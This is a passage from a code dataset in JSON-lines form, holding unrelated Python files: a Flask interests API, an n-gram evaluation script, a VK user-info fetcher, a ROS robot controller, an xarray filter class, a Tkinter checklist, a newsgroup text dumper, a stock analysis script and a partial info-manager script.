add_to_log('error during create user', e)\n        return 'User created', 201\n\n\n@application.route('/statistics')\ndef get_statistic():\n    \"\"\"Returns the interests of all users\"\"\"\n    try:\n        data = r.table('interests').run(g.rdb_conn)\n    except Exception as e:\n        add_to_log('error during get statistic', e)\n        return str(e), 500\n    else:\n        results = []\n        for i in data.items:\n            results.append(i['interests'])\n        return json.dumps(results)\n\n\n@application.route('/interests', methods=['POST'])\ndef data_processing():\n    \"\"\"Getting data into json to store in the database\"\"\"\n    data = request.get_json()\n    user_id = request_verification(data)\n\n    if isinstance(user_id, int):\n        return codes[user_id], user_id\n    else:\n        interest = {\n            'user_id': user_id,\n            'interests': data['interests']\n        }\n        try:\n            r.table('interests').insert(interest).run(g.rdb_conn)\n        except Exception as e:\n            add_to_log(e)\n            return str(e), 500\n        else:\n            return 'The record is created', 201\n\n\n@application.route('/profile', methods=['POST'])\ndef get_user_interests():\n    \"\"\"Returns the user's interests\"\"\"\n    data = request_verification(request.get_json())\n    if isinstance(data, int):\n        return codes[data], data\n    else:\n        try:\n            user_data = r.table('interests').filter(r.row['user_id'] == data).run(g.rdb_conn)\n        except Exception as e:\n            return str(e), 500\n        else:\n            interests = user_data.items[0].get('interests')\n            return json.dumps(interests), 200\n\n\n# helper functions\ndef user_exists(email):\n    user_in_db = r.table('users').filter(r.row['email'] == email).run(g.rdb_conn)\n    if user_in_db.items:\n        return True\n    else:\n        return False\n\n\ndef get_user_id(email):\n    user = r.table('users').filter(r.row['email'] == email).run(g.rdb_conn)\n    return user.items[0].get('id')\n\n\ndef request_verification(data):\n    \"\"\"Checks for field email and whether there is a user in the database\"\"\"\n    if 'email' in data:\n        if user_exists(data['email']):\n            return get_user_id(data['email'])\n        else:\n            return 401\n    else:\n        return 400\n\n\nif __name__ == '__main__':\n    application.run(debug=True)\n    # TODO add logging to a file\n    # TODO remove 200, 500\n","sub_path":"api/api_app.py","file_name":"api_app.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"244919743","text":"\"\"\"Script to extract evaluation instances for recommendation.\n\nThe evaluation instances are taken from the test sequences.\n\nEach instance is a group of ngrams that:\n * share the same prefix. The size of the prefix varies from 2 to n-1.\n * occur in more than min_freq sequences\n\nThe output of the script, if output_filename is provided, is a pickled dict\nmapping from each prefix to the suffixes and instances where they occur.\n\n{\n    prefix [tuple]: {\n        suffix [tuple]: (\n            instances [list of numpy_arrays]\n            labels [list of ints]\n        )\n    }\n}\n\"\"\"\nimport numpy\nimport argparse\nimport sys\n\nsys.path.append('./')\n\nfrom collections import defaultdict\nfrom quick_experiment import utils\n\n\ndef parse_arguments():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--input_filename', type=str,\n                        help='The path to the pickled file with the processed '\n                             'sequences.')\n    parser.add_argument('--output_filename', type=str, default=None,\n                        help='The path to the file to store the evaluation '\n                             'instances')\n    parser.add_argument('--explore', action='store_true',\n                        help='Explore different combinations and print obtained '\n                             'sizes.')\n    parser.add_argument('--N', type=int, default=3,\n                        help='The size of the ngrams.')\n    parser.add_argument('--min_freq', type=int, default=5,\n                        help='The minimum frequency for an instance.')\n\n    return parser.parse_args()\n\n\ndef get_ngram_positions(N, sequences):\n    ngram_positions = defaultdict(dict)\n    for index, sequence in enumerate(sequences):\n        for i in range(len(sequence) - N + 1):\n            ngram = tuple(sequence[i: i + N][:, 0].tolist())\n            ngram_positions[ngram][index] = i\n    return ngram_positions\n\n\ndef get_evaluation_ngrams(MIN_FREQ, ngram_positions, suffix_size=1):\n    evaluation_ngrams = defaultdict(list)\n    for ngram, indices in ngram_positions.items():\n        if len(indices) < MIN_FREQ:\n            continue\n        evaluation_ngrams[ngram[:-suffix_size]].append(ngram[-suffix_size:])\n    filtered_evaluation = {prefix: suffixes\n                           for prefix, suffixes in evaluation_ngrams.items()\n                           if len(suffixes) >= 2}\n    return filtered_evaluation\n\n\ndef get_instances(filtered_ngrams, labels, ngram_positions, sequences):\n    evaluation_instances = defaultdict(dict)\n    for prefix, sufixes in filtered_ngrams.items():\n        for sufix in sufixes:\n            ngram = prefix + sufix\n            # https://stackoverflow.com/questions/835092/\n            # python-dictionary-are-keys-and-values-always-the-same-order\n            lengths = [x for x in ngram_positions[ngram].values()]\n            instances = []\n            instances_labels = []\n            for index, length in ngram_positions[ngram].items():\n                instance = sequences[index][:length + len(prefix)]\n                assert numpy.array_equal(instance[-len(prefix):, 0], prefix)\n                instances.append(instance)\n                instances_labels.append(labels[index])\n            evaluation_instances[prefix][sufix] = (instances, instances_labels)\n            assert len(instances) == len(instances_labels)\n    return evaluation_instances\n\n\ndef get_suffixes(N, labels, min_freq, sequences):\n    sufixes_dict = {}\n    for suffix_size in range(1, N - 1):\n        ngram_positions = get_ngram_positions(N, sequences)\n        filtered_ngrams = 
get_evaluation_ngrams(\n min_freq, ngram_positions, suffix_size)\n\n evaluation_instances = get_instances(filtered_ngrams, labels,\n ngram_positions, sequences)\n print('min_freq {} / N {} / suffix_size {}'.format(\n min_freq, N, suffix_size))\n print('Prefixes found: {}'.format(len(evaluation_instances)))\n print('Total instances found: {}'.format(sum(\n [len(instances[0])\n for suffixes_dict in evaluation_instances.values()\n for instances in suffixes_dict.values()]\n )))\n sufixes_dict[suffix_size] = evaluation_instances\n return sufixes_dict\n\n\ndef get_possible_ngrams(sequences, min_n, max_n):\n all_ngrams = {}\n for size in range(min_n, max_n + 1):\n ngrams = get_ngram_positions(size, sequences)\n all_ngrams[size] = [ngram for ngram, occurrences in ngrams.items()\n if len(occurrences) >= 5]\n print('Suffixes with size {}: {}'.format(size, len(all_ngrams[size])))\n return all_ngrams\n\n\ndef get_max_id(sequences):\n return numpy.max([instance[:,0].max(axis=0) for instance in sequences],\n axis=0)\n\n\ndef main():\n args = parse_arguments()\n raw_sequences = utils.pickle_from_file(args.input_filename)\n test_sequences = raw_sequences[1]\n test_labels = raw_sequences[3]\n\n if args.explore:\n for min_freq in [3, 5, 10]:\n for N in range(3, 6):\n get_suffixes(\n N, test_labels, min_freq, test_sequences)\n else:\n train_sequences = raw_sequences[0]\n possible_suffixes = get_possible_ngrams(train_sequences, 1, args.N - 2)\n max_id = get_max_id(\n numpy.concatenate([train_sequences, test_sequences]))\n evaluation_instances = get_suffixes(\n args.N, test_labels, args.min_freq, test_sequences)\n if args.output_filename is not None:\n utils.pickle_to_file(\n [possible_suffixes, evaluation_instances, max_id],\n args.output_filename)\n print('All operations completed')\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"preprocess/get_evaluation_instances.py","file_name":"get_evaluation_instances.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"368038076","text":"# coding: utf8\r\n__author__ = 'Lev'\r\nimport requests\r\nimport json\r\nimport re\r\nfrom datetime import datetime\r\n\r\nfrom domain.user import User\r\nfrom settings import VK_SEARCHING_TOKEN\r\nfrom util import log\r\nfrom resources import GENDERS\r\n\r\n\r\ngender_dict_vk = {0: GENDERS['undef'], 1: GENDERS['F'], 2: GENDERS['M']}\r\ndate_pattern = '\\d+\\.\\d+\\.\\d+'\r\n\r\n\r\ndef get_user_info(user_id, r_date):\r\n log('getting info for {}'.format(user_id))\r\n method_url = 'https://api.vk.com/method/users.get?'\r\n params = dict(access_token=VK_SEARCHING_TOKEN, user_ids=user_id, fields='bdate,sex')\r\n response = requests.get(method_url, params=params)\r\n result = json.loads(response.text)\r\n if 'error' in result:\r\n error = 'searching error({}): {}'.format(result['error']['error_code'], result['error']['error_msg'])\r\n raise Exception(error)\r\n result = result['response'][0]\r\n name = result['first_name'] + ' ' + result['last_name']\r\n b_date = None\r\n if 'bdate' in result and re.match(date_pattern, result['bdate']) is not None:\r\n b_date = datetime.strptime(result['bdate'], '%d.%m.%Y').date()\r\n gender = gender_dict_vk[result['sex']] if 'gender' in result else GENDERS['undef']\r\n return User(user_id, name, b_date, gender, 
r_date)\r\n","sub_path":"vk_api/searching.py","file_name":"searching.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"453517477","text":"#!/usr/bin/env python\nimport rospy\nimport nav_msgs.msg\nimport math\nfrom geometry_msgs.msg import Twist\nfrom gazebo_msgs.msg import ModelStates\nfrom nav_msgs.msg import Odometry\n\nimport plotly.graph_objects as go\nimport pandas as pd\nimport numpy as np\n\nimport time\nimport datetime\n\n\ndef quaternion_to_euler(x,y,z,w) :\n\n\tt0 = 2*(w*x+y*z)\n\tt1 = 1-2*(x*x+y*y)\n\tX = math.degrees(math.atan2(t0,t1))\n\n\tt2 = 2*(w*y-z*x)\n\tt2 = +1.0 if t2 > +1.0 else t2\n\tt2 = -1.0 if t2 < -1.0 else t2\n\tY = math.degrees(math.asin(t2))\n\n\tt3 = 2*(w*z+x*y)\n\tt4 = 1-2*(y*y+z*z)\n\tZ = math.degrees(math.atan2(t3, t4))\n\n\t# X=roll Y=pitch Z=yaw (returned in radians; the degree values above are overwritten)\n\tX = math.atan2(t0, t1)\n\tY = math.asin(t2)\n\tZ = math.atan2(t3,t4)\n\n\treturn X, Y, Z\n\n# Used for selecting next goal\ngoal_index = 0\n\n# Some inspiration found here: https://github.com/SMARTlab-Purdue/ros-tutorial-gazebo-simulation/blob/master/gazebo-tutorial/scripts/nre_simhuskycontrol.py\ndef husky_odo_callback(data, args):\n\t\n\tpub, cmd_msg, goals = args\n\n\tglobal goal_index\n\n\tcurrent_goal = goals[goal_index]\n\t\n\t# Controller coefficients\n\tkp = 0.3\n\tka = 1.5\n\tkb = -0.001\n\n\t# Get x and y from gazebo\n\tx = data.pose.pose.position.x\n\ty = data.pose.pose.position.y\n\n\t#print(data.twist.twist)\n\n\tpos_quat = data.pose.pose.orientation\n\tpos_eul = quaternion_to_euler(pos_quat.x, pos_quat.y,\n\t\t\t\t\t\t\t\t  pos_quat.z, pos_quat.w)\n\t\n\t# Yaw from pos_eul in rads\n\ttheta = pos_eul[2]\n\t# Distance to goal\n\tro = math.sqrt((current_goal[0]-x)**2+(current_goal[1]-y)**2)\n\t\n\t# Angle between the axis of the robot's reference frame and the vector connecting the center of\n\t# the axle of the wheels with the final position\n\talpha = -theta + math.atan2((current_goal[1]-y), (current_goal[0]-x))\n\t\n\t# Angle between the goal-direction vector and the desired final heading (beta = -theta - alpha)\n\tbeta = -theta-alpha\n\n\t# Linear velocity and angular velocity commands\n\tv = kp*ro\n\tw = ka*alpha+kb*beta\n\n\t# publish new speed and angle\n\tcmd_msg.linear.x = v\n\tcmd_msg.angular.z = w\n\n\tpub.publish(cmd_msg)\n\n\t#print(ro, current_goal)\n\t\n\t# Make robot go to the four corner coordinates\n\tif ro < 0.5:\n\t\tprint(\"Setting new goal coordinates\")\n\t\tgoal_index = goal_index + 1\n\t\t\n\t\tif goal_index == len(goals):\n\t\t\tgoal_index = 0\n\n\t\t\tmake_traj_plot(trajectory_model, trajectory_odo)\n\t\t\tmake_dist_plot(distance_traveled_model, distance_traveled_odo)\n\t\t\tmake_yaw_plot(yaw_model, yaw_odo)\n\t\t\t\n\t\t\tcurrent_goal = goals[goal_index]\n\t\t\trospy.signal_shutdown(\"Plot has been made. 
Shutting down...\")\n\n\ndef make_traj_plot(model, odo):\n\n\tprint(\"Printing figure\")\n\ttraj_m_df = pd.DataFrame(model, columns=['x_model', 'y_model'])\n\ttraj_o_df = pd.DataFrame(odo, columns=['x_odo','y_odo'])\n\n\n\t# Check to see if dataframes have same length\n\tif len(traj_m_df) != len(traj_o_df):\n\t\tif len(traj_m_df) > len(traj_o_df):\n\t\t\ttraj_m_df.drop(traj_m_df.tail(1).index,inplace=True)\n\t\t\t\n\t\telif len(traj_m_df) < len(traj_o_df):\n\t\t\ttraj_o_df.drop(traj_o_df.tail(1).index,inplace=True)\n\n\tfig1 = go.Figure()\n\n\tfig1.add_trace(go.Scatter(\n\t\tx=traj_m_df['x_model'],\n\t\ty=traj_m_df['y_model'],\n\t\tname=\"/gazebo/model_states\"\n\t\t))\n\n\tfig1.add_trace(go.Scatter(\n\t\tx=traj_o_df['x_odo'],\n\t\ty=traj_o_df['y_odo'],\n\t\tname=\"/odometry/filtered\"\n\t\t))\n\n\tfig1.update_layout(\n\t\ttitle=\"Odometry vs ground-truth position\",\n\t\txaxis_title=\"X-coordinates\",\n\t\tyaxis_title=\"Y-coordinates\"\n\t\t)\n\n\tfig1.show()\n\ndef make_dist_plot(dist_model, dist_odo):\n\t\n\tprint(\"Printing figure\")\n\tdist_odo_df = pd.DataFrame(dist_odo, columns=['distance', 'time'])\n\tdist_model_df = pd.DataFrame(dist_model, columns=['distance', 'time'])\n\n\tfig1 = go.Figure()\n\n\tfig1.add_trace(go.Scatter(\n\t\tx=dist_model_df['time'],\n\t\ty=dist_model_df['distance'],\n\t\tname=\"Distance traveled(ground-truth)\"\n\t\t))\n\n\tfig1.add_trace(go.Scatter(\n\t\tx=dist_odo_df['time'],\n\t\ty=dist_odo_df['distance'],\n\t\tname=\"Distance traveled(odometry)\"\n\t\t))\n\n\tfig1.update_layout(\n\t\ttitle=\"Distance traveled over time\",\n\t\txaxis_title=\"Time\",\n\t\tyaxis_title=\"Distance\"\n\t\t)\n\n\tfig1.show()\n\ndef make_yaw_plot(yaw_m, yaw_o):\n\t\n\tprint(\"Printing figure\")\n\tyaw_odo_df = pd.DataFrame(yaw_o, columns=['yaw', 'time'])\n\tyaw_model_df = pd.DataFrame(yaw_m, columns=['yaw', 'time'])\n\n\tfig1 = go.Figure()\n\n\tfig1.add_trace(go.Scatter(\n\t\tx=yaw_model_df['time'],\n\t\ty=yaw_model_df['yaw'],\n\t\tname=\"yaw(ground-truth)\"\n\t\t))\n\n\tfig1.add_trace(go.Scatter(\n\t\tx=yaw_odo_df['time'],\n\t\ty=yaw_odo_df['yaw'],\n\t\tname=\"yaw(odometry)\"\n\t\t))\n\n\tfig1.update_layout(\n\t\ttitle=\"yaw over time\",\n\t\txaxis_title=\"Time\",\n\t\tyaxis_title=\"yaw\"\n\t\t)\n\n\tfig1.show()\n\n\nyaw_odo = []\ndistance_traveled_odo =[]\ntrajectory_odo = []\ndef odometry_callback(data, args):\n\n\tt0, t_total_o = args\n\tglobal trajectory_odo\n\tglobal distance_traveled_odo\n\tglobal yaw_odo\n\n\tt1 = datetime.datetime.now()\n\tduration = t1 - t0\n\ttime = float(duration.total_seconds())\n\n\tx = data.pose.pose.position.x\n\ty = data.pose.pose.position.y\n\n\tpos_quat = data.pose.pose.orientation\n\tpos_eul = quaternion_to_euler(pos_quat.x, pos_quat.y,\n\t\t\t\t\t\t\t\t pos_quat.z, pos_quat.w)\n\t\n\t# Yaw from pos_eul in rads\n\ttheta = pos_eul[2]\n\n\tnew_pos = [x,y]\n\n\tif len(trajectory_odo) != 0: \n\t\tif len(distance_traveled_odo) == 0 and len(yaw_odo) == 0:\n\t\t\tdistance_traveled_odo.append([0,0])\n\t\t\tyaw_odo.append([0,0])\n\n\t\tdist = get_euclidean_dist(trajectory_odo[-1], new_pos)\n\t\tnew_dist = distance_traveled_odo[-1][0] + dist\n\n\t\tdistance_traveled_odo.append([new_dist, time])\n\t\tyaw_odo.append([theta, time])\n\n\t\tprint(distance_traveled_odo[-1])\n\n\ttrajectory_odo.append([x,y])\n\tt_total_o.append(time)\n\n\ndef get_euclidean_dist(cords1, cords2):\n\treturn math.sqrt(math.pow(cords1[0]-cords2[0],2)+(math.pow(cords1[1]-cords2[1],2)))\n\nyaw_model = []\ndistance_traveled_model = []\ntrajectory_model = []\ndef 
model_state_callback(data, args):\n\n\tt0, t_total_m = args\n\tglobal trajectory_model\n\tglobal distance_traveled_model\n\tglobal yaw_model\n\n\tt1 = datetime.datetime.now()\n\tduration = t1 - t0\n\ttime = float(duration.total_seconds())\n\n\tx = data.pose[2].position.x\n\ty = data.pose[2].position.y\n\n\tpos_quat = data.pose[2].orientation\n\tpos_eul = quaternion_to_euler(pos_quat.x, pos_quat.y,\n\t\t\t\t\t\t\t\t pos_quat.z, pos_quat.w)\n\t\n\t# Yaw from pos_eul in rads\n\ttheta = pos_eul[2]\n\n\tnew_pos = [x,y]\n\n\tif len(trajectory_model) != 0: \n\t\tif len(distance_traveled_model) == 0 and len(yaw_model) == 0:\n\t\t\tdistance_traveled_model.append([0,0])\n\t\t\tyaw_model.append([0,0])\n\n\t\tdist = get_euclidean_dist(trajectory_model[-1], new_pos)\n\t\tnew_dist = distance_traveled_model[-1][0] + dist\n\n\t\tdistance_traveled_model.append([new_dist, time])\n\t\tyaw_model.append([theta, time])\n\n\t\tprint(distance_traveled_model[-1])\n\n\ttrajectory_model.append([x,y])\n\tt_total_m.append(time)\n\n\ndef setup():\n\tgoal_index = 0\n\n\tprint(\"Setup \")\n\n\t# The four corners of the \"maze\"\n\tgoals = [[2.8,0], [10.5,-1], [11.3,5], [5,5]]\n\tgoal_index = 0\n\n\tt0 = datetime.datetime.now()\n\tt_total_m = []\n\tt_total_o = []\n\n\t# Setup node\n\trospy.init_node(\"basic_subscriber\", anonymous=True, disable_signals=True)\n\n\t# Message used to send commands to robot\n\tcmd_msg = Twist()\n\n\t# initialize publisher\n\tpub = rospy.Publisher(\"husky_velocity_controller/cmd_vel\", Twist, queue_size=10)\n\n\t# Initialize subscriber\n\todometry_subscriber = rospy.Subscriber('/odometry/filtered', Odometry, husky_odo_callback, (pub, cmd_msg, goals))\n\n\tmodelstate_plot_subscriber = rospy.Subscriber('/gazebo/model_states', ModelStates, model_state_callback, (t0, t_total_m))\n\todometry_plot_subscriber = rospy.Subscriber('/odometry/filtered', Odometry, odometry_callback, (t0, t_total_o))\n\n\nif __name__ =='__main__':\n\ttry:\n\t\tsetup()\n\n\n\t\t# This line keeps the subscriber() function alive until a user terminates using CTRL+C.\n\t\trospy.spin()\n\n\texcept rospy.ROSInterruptException:\n\t\tpass","sub_path":"husky_sensors/src/scripts/simple_maze_odometry.py","file_name":"simple_maze_odometry.py","file_ext":"py","file_size_in_byte":7506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"355794611","text":"from ..algorithm import Algorithm\nfrom abc import abstractmethod\nfrom ..utils import get_vars_for_dims, expand_variables\n\n\nclass Filter(Algorithm):\n \"\"\"\n The base class for a generic filter.\n\n Parameters\n ----------\n dims : tuple of str\n The dimensions along which the filter is applied.\n \"\"\"\n\n # If per_variable is True, the filter is applied independently for\n # each variable. 
Otherwise, all variables may be used to determine the\n # filter weights.\n per_variable = True\n dims = ()\n\n @abstractmethod\n def __init__(self, *args, **kwargs):\n return\n\n def apply(self, ds, inplace=False):\n \"\"\"\n Apply the filter to the input dataset.\n\n Parameters\n ----------\n ds : xarray.Dataset\n The input dataset\n inplace : bool, optional\n If True, overwrite the input data inplace (default: False).\n\n Returns\n -------\n xarray.Dataset\n The filtered dataset\n \"\"\"\n if inplace:\n raise NotImplementedError('Inplace filtering is not currently '\n 'implemented.')\n\n # This is not in the correct order, as ds.dims is always sorted\n # alphabetically.\n orig_dims = tuple(ds.dims)\n ordered_dims = self.dims + tuple(set(orig_dims) - set(self.dims))\n\n # Find all variables that match the given dimensions\n variables = get_vars_for_dims(ds, self.dims)\n other_variables = get_vars_for_dims(ds, self.dims, invert=True)\n\n #\n # Apply the actual filter\n #\n if self.per_variable:\n # Apply independently for each variable.\n result = ds.copy(deep=True)\n for v in variables:\n vdims = result[v].dims\n axes = tuple([vdims.index(d) for d in self.dims])\n # Prepare data and output as numpy arrays\n self._filter(ds[v].values, axes,\n output=result[v].values)\n\n else:\n # The variables are an additional dimension.\n ordered_dims = ordered_dims + ('variable',)\n\n # convert to DataArray\n da_ordered = ds[variables].to_array().transpose(*ordered_dims)\n da_filtered = da_ordered.copy()\n axes = tuple([da_ordered.dims.index(d) for d in self.dims])\n\n # Prepare data and output as numpy arrays\n self._filter(da_ordered.values, axes, output=da_filtered.values)\n\n # Reassemble Dataset\n result = expand_variables(da_filtered)\n # Make sure all variable dimensions are in the original order\n for v in result.data_vars:\n result[v] = result[v].transpose(*ds[v].dims)\n\n for v in other_variables:\n result[v] = ds[v]\n\n return result\n\n @abstractmethod\n def _filter(self, arr, axes, output=None):\n \"\"\"\n This method must be implemented by all derived classes.\n \"\"\"\n return\n","sub_path":"nd/filters/filter_.py","file_name":"filter_.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"236431179","text":"\nfrom tkinter import *\nfrom app.enum.outpins import OutPin\nfrom app.gui import OFF_COLOR, ON_COLOR\n\nDEFAULT_FONT = (\"Arial\", 40)\n\nclass Checklist(Frame):\n def __init__(self, parent, st):\n super().__init__(parent, borderwidth=2, relief=SUNKEN)\n \n self.start = st\n \n self.tempitem = Label(self, text=\"Temperature Set\", font=DEFAULT_FONT, bg=OFF_COLOR)\n self.nipitem = Label(self, text=\"Nip Closed\",font=DEFAULT_FONT, bg=OFF_COLOR)\n self.brakeitem = Label(self, text=\"Brake Disengaged\",font=DEFAULT_FONT, bg=ON_COLOR)\n self.clutchitem = Label(self, text=\"Clutch Engaged\",font=DEFAULT_FONT, bg=OFF_COLOR)\n self.vacitem = Label(self, text=\"Vac/Air On\", font=DEFAULT_FONT, bg=OFF_COLOR)\n \n self.simple = {OutPin.ChainClutch: self.clutchitem,\n OutPin.UnwindBrake: self.brakeitem,\n OutPin.NipsSolenoid: self.nipitem,\n OutPin.VacAir: self.vacitem}\n self.tempitem.val = False\n self.tempitem.pack(fill=X)\n self.nipitem.val = False\n self.nipitem.pack(fill=X)\n self.brakeitem.val = True\n self.brakeitem.pack(fill=X)\n self.clutchitem.val = False\n self.clutchitem.pack(fill=X)\n self.vacitem.val = False\n self.vacitem.pack(fill=X)\n\n def check_start(self):\n if self.tempitem.val 
and self.nipitem.val and self.brakeitem.val and self.clutchitem.val and self.vacitem.val:\n self.start.unlock()\n else:\n self.start.lock()\n \n def set_good(self, item):\n item['bg'] = ON_COLOR\n item.val = True\n\n def set_bad(self, item):\n item['bg'] = OFF_COLOR\n item.val = False\n\n def set_temp(self, temp, in_zone):\n if in_zone:\n self.set_good(self.tempitem)\n else:\n self.set_bad(self.tempitem)\n self.check_start()\n\n def onclick(self, pin, val):\n if pin is OutPin.UnwindBrake:\n val = not val\n\n if val:\n self.set_good(self.simple[pin])\n else:\n self.set_bad(self.simple[pin])\n self.check_start()\n","sub_path":"app/gui/checklist.py","file_name":"checklist.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"517005746","text":"__author__ = 'Atanassov'\n\nfrom sklearn.datasets import fetch_20newsgroups\nimport re\n\nif __name__ == '__main__':\n\n newsgroups_train = fetch_20newsgroups(subset='train', remove=('headers', 'footers', 'quotes'))\n newsgroups_test = fetch_20newsgroups(subset='test', remove=('headers', 'footers', 'quotes'))\n\n for i in range(len(newsgroups_train.filenames)):\n data = newsgroups_train.data[i].replace('\\x92', '\\'')\n if re.search('[a-zA-Z]', data) != None:\n filename = '..\\\\raw-in\\\\' + newsgroups_train.filenames[i][49:].replace('\\\\', '_') + '.txt'\n handle = open(filename, 'w')\n handle.write(data)\n handle.close()\n\n for i in range(len(newsgroups_test.filenames)):\n data = newsgroups_test.data[i].replace('\\x92', '\\'')\n if re.search('[a-zA-Z]', data) != None:\n filename = '..\\\\raw-in\\\\' + newsgroups_test.filenames[i][49:].replace('\\\\', '_') + '.txt'\n handle = open(filename, 'w')\n handle.write(data)\n handle.close()\n\n","sub_path":"obc_20k.py","file_name":"obc_20k.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"432286008","text":"'''\r\nimport various libraries to be\r\nused in this project\r\n'''\r\nimport pandas as pd\r\nimport numpy as np\r\nimport datetime as dt\r\nimport pandas_datareader as dr\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\n'''\r\nreading bank stocks data off the internet\r\nfor various banks.\r\nthe datareader method identifies the bank name from its ticker. unfortunately google is not \r\navailable for some reason. 
set the start and end as a datetime object\r\n'''\r\n\r\nbac = dr.data.DataReader('BAC', data_source='yahoo', start=dt.datetime(2006, 1, 1), end=dt.datetime(2016, 1, 1))\r\nc = dr.data.DataReader('C', data_source='yahoo', start=dt.datetime(2006, 1, 1), end=dt.datetime(2016, 1, 1))\r\n# sbin = dr.data.DataReader('SBIN',data_source='yahoo',start=dt.datetime(2006,1,1),end=dt.datetime(2016,1,1))\r\ngs = dr.data.DataReader('GS', data_source='yahoo', start=dt.datetime(2006, 1, 1), end=dt.datetime(2016, 1, 1))\r\njpm = dr.data.DataReader('JPM', data_source='yahoo', start=dt.datetime(2006, 1, 1), end=dt.datetime(2016, 1, 1))\r\nms = dr.data.DataReader('MS', data_source='yahoo', start=dt.datetime(2006, 1, 1), end=dt.datetime(2016, 1, 1))\r\nwfc = dr.data.DataReader('WFC', data_source='yahoo', start=dt.datetime(2006, 1, 1), end=dt.datetime(2016, 1, 1))\r\n\r\n'''\r\ncreating a list object ticker and storing a list of all the tickers of the banks\r\nin alphabetical order \r\n'''\r\ntickers = ('BAC C GS MS JPM WFC'.split())\r\ntickers.sort()\r\nprint(tickers)\r\n\r\n# create a new dataframe merging all the data of the banks\r\nbank_stocks = pd.concat([bac, c, gs, jpm, ms, wfc], axis=1, keys=tickers)\r\n\r\n# printing the head of the bank stocks dataframe\r\nprint(bank_stocks.head())\r\n\r\n# naming the two levels of columns\r\nbank_stocks.columns.names = ['Bank Ticker', 'Stock Info']\r\n\r\n# print the dataframe head again with new column indices\r\nprint(bank_stocks.head(2))\r\n\r\n'''\r\nusing the cross section .xs function to\r\nprint the highest single day closing value of various banks\r\n'''\r\nprint(bank_stocks.xs(key='Close', axis=1, level='Stock Info').max())\r\n\r\n'''\r\ncreating a new dataframe returns and storing the percentage change values \r\nof closing values of all the banks\r\nprinting the head of the returns dataframe\r\n'''\r\nreturns = pd.DataFrame()\r\nfor ticks in tickers:\r\n    returns[ticks + ' return'] = bank_stocks[ticks]['Close'].pct_change()\r\n\r\nprint(returns.head(5))\r\n# dropping NaN values\r\nreturns.dropna(inplace=True)\r\n\r\n'''\r\nsetting the seaborn plot style for all \r\nplots and drawing a pairplot for the returns value of each bank against ALL other banks\r\n'''\r\nsns.set_style('whitegrid')\r\nsns.pairplot(data=returns, kind='reg', diag_kind='kde', )\r\nplt.show()\r\n\r\n'''\r\nthis part of the code is faulty.\r\nIt is supposed to print the dataframe containing the date of worst and best single day return \r\nof each bank.\r\nI have done this instead using the idxmax() and idxmin() functions\r\nthe faulty code is as follows\r\n------------------------------------------------------------------------------------------------------\r\nret_max=pd.Series()\r\nret_min=pd.Series()\r\ndef check_ret_max():\r\n    for p in tickers:\r\n        ret_max.append(returns[p+' return'].argmax())\r\n    return ret_max()\r\ndef check_ret_min():\r\n    for p in tickers:\r\n        ret_min.append(returns[p+' return'].argmin())\r\n    return ret_min()\r\n\r\ncheck_ret_min()\r\ncheck_ret_max()\r\n\r\nprint (ret_max)\r\nprint (ret_min)\r\n------------------------------------------------------------------------------------------------------\r\n'''\r\nprint(returns.idxmin())\r\nprint(returns.idxmax())\r\n\r\n#prints the standard deviation of the returns of all the banks\r\nprint('STANDARD DEVIATION OF THE BANKS IS:')\r\nprint(returns.apply(np.std))\r\n\r\n\r\n'''\r\ncreating a distplot of returns of year 2015 of morgan stanley stocks \r\n'''\r\nsns.distplot(returns.loc[dt.datetime(2015,1,1):dt.datetime(2015,12,31)]['MS return'],bins=100,color='green',kde=True)\r\nplt.show()\r\n\r\n'''\r\ncreating the distplot of citibank return of year 2008\r\n'''\r\nsns.distplot(returns.loc[dt.datetime(2008,1,1):dt.datetime(2008,12,31)]['C return'],bins=100,color='red')\r\nplt.show()\r\n\r\n'''\r\ncreating a line plot of all the banks' closing value\r\n'''\r\nbank_stocks.xs(key='Close',level=1,axis=1).plot(figsize=(16,9))\r\nplt.legend()\r\nplt.show()\r\n\r\n'''\r\nheatmap of correlation of closing values of all banks\r\n'''\r\nsns.heatmap(bank_stocks.xs(key='Close',level=1,axis=1).corr(),cmap='magma',annot=True)\r\nplt.show()\r\n'''\r\nclustermap of correlation of closing values of all banks\r\n'''\r\n\r\nsns.clustermap(bank_stocks.xs(key='Close',level=1,axis=1).corr(),cmap='magma',annot=True)\r\nplt.tight_layout()\r\nplt.show()","sub_path":"DataCapstone/FinanceProject.py","file_name":"FinanceProject.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"636054465","text":"#!/usr/bin/python\n\n'''\na simple script for managing information\n'''\n\nimport shelve\nfrom functools import reduce\nimport sys\nimport os\n\nclass Info:\n    '''\n    a piece of information, contains `name`, `text`(optional) and `date`(optional)\n    '''\n    def __init__(self, name, text=None, date=None):\n        self.name, self.text, self.date = name, text, date\n\n    def __str__(self):\n        head = (self.date + ' | ') if self.date else ''\n        body = self.name\n        back = (' : ' + self.text) if self.text else ''\n\n        return head + body + back\n\ndef parse_args(argv, shv):\n\n    if len(argv) == 0:\n        return ('', '')\n    \n    assert(len(argv) == 2), f'invalid number of arguments : {argv}'\n\n    argv = [i.lower() for i in argv]\n\n    if argv[0] == 'add':\n        pass\n    elif argv[0] == 'del':\n        assert(argv[1] in shv), f'{argv[1]} does not exist'\n    elif argv[0] == 'help':\n        pass\n    else:\n        raise AssertionError(f'invalid argument : {argv[0]}')\n\n    return argv\n    \ndef 